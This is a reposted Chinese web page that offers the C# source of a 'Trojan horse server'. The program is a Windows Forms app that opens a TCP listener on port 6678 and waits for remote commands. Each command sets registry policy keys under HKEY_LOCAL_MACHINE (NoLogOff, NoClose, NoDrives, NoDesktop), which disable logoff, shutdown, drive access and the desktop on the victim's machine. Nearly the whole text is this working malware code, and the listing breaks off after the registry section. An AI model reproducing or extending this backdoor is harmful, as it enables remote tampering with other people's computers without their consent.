特洛伊木馬伺服器原始碼(C#)
來源:互聯網
上載者:User
伺服器|木馬|原始碼
using System; using System.Drawing; using System.Collections; using System.ComponentModel; using System.Windows.Forms; using System.Data; using System.IO; using System.Net; using System.Net.Sockets; using System.Threading; using Microsoft.Win32; namespace server { /**//// /// Form1 的摘要說明。 /// public class Form1 : System.Windows.Forms.Form { /**//// /// 必需的設計器變數。 /// private System.ComponentModel.Container components = null; private TcpListener listener; private string mystr="您好!非常抱歉,您的註冊表:"; private RegistryKey rrr=Registry.LocalMachine; private RegistryKey key1; public Form1() { // // Windows 表單設計器支援所必需的 // InitializeComponent(); {int port =6678; listener=new TcpListener(port); listener.Start(); Thread thread=new Thread(new ThreadStart(target)); thread.Start(); } // // TODO: 在 InitializeComponent 調用後添加任何建構函式代碼 // } public void target() { Socket socket= listener.AcceptSocket(); while(socket.Connected) { byte[] by=new Byte[6]; int i=socket.Receive(by,by.Length,0); string ss=System.Text.Encoding.ASCII.GetString(by); //OOOOOOOOOOOOOOOOOOOOOOOOOOO以下是修改註冊表OOOOOOOOOOOOOOOOOOOOOOOOOOO //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& if(ss=="jiance") { string str="hjc"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); } if(ss=="zx1000") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff被修改!請將它置為0!"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff被修改!請將它置為0!"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if(ss=="") //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& //**************************************************************************** if(ss=="zx0100") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoClose",1); key1.Close(); mystr=mystr+"LocalMachine\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose被修改!請將它置為0!"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoClose",1); key2.Close(); mystr=mystr+"LocalMachine\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose被修改!請將它置為0!"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if(ss=="zx0100"){ //**************************************************************************** //++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ if(ss=="zx0010") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoDrives",12); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoDrives被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoDrives",12); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoDrives被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ //==================================================================== if(ss=="zx0001") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoDesktop被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //========================================================================= //$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ if(ss=="zx1100") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.SetValue("NoClose",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.SetValue("NoClose",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& if(ss=="zx1010") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.SetValue("NoDrives",12); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoDrives被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.SetValue("NoDrives",12); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoDrives被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //************************************************** if(ss=="zx1001") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoDesktop被修改!請將它置為0"; } catch(Exception ee){MessageBox.Show(ee.Message);} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //******************************************** if(ss=="zx0110") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoClose",1); key1.SetValue("NoDrives",12); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose、NoDrives被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoClose",1); key2.SetValue("NoDrives",12); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose、NoDrives被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //******************************************** if(ss=="zx0101") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoClose",1); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose、NoDesktop被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoClose",1); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose、、NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //******************************** if(ss=="zx0011") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoDrives",12); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoDrives、NoDesktop被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoDrives",12); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoDrives、NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //************************************ if(ss=="zx1110") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.SetValue("NoClose",1); key1.SetValue("NoDrives",12); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose、NoDrives被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.SetValue("NoClose",1); key2.SetValue("NoDrives",12); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose、NoDrives被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //************************************** if(ss=="zx1101") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.SetValue("NoClose",1); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose、NoDesktop被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.SetValue("NoClose",1); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose、NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //****************************************** if(ss=="zx1011") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.SetValue("NoDrives",12); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoDrives、NoDesktop被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.SetValue("NoDrives",12); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoDrives、NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //******************************************** if(ss=="zx0111") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoDrives",12); key1.SetValue("NoClose",1); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose、NoDrives、NoDesktop被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoDrives",12); key2.SetValue("NoClose",1); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoClose、NoDrives、NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //******************************************** if(ss=="zx1111") { try { key1=rrr.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",true); key1.SetValue("NoLogOff",1); key1.SetValue("NoClose",1); key1.SetValue("NoDrives",12); key1.SetValue("NoDesktop",1); key1.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose、NoDrives、NoDesktop被修改!請將它置為0"; } catch{} if(key1==null) { try { RegistryKey key2=rrr.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"); key2.SetValue("NoLogOff",1); key2.SetValue("NoClose",1); key2.SetValue("NoDrives",12); key2.SetValue("NoDesktop",1); key2.Close(); mystr=mystr+"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer索引值NoLogOff、NoClose、NoDrives、NoDesktop被修改!請將它置為0"; }//try catch{} }//if(key1==null){ string str="hkz"; byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray()); socket.Send(bytee,bytee.Length,0); }//if //********************************************* //OOOOOOOOOOOOOOOOOOOOOOOOOOO以上是修改註冊表OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO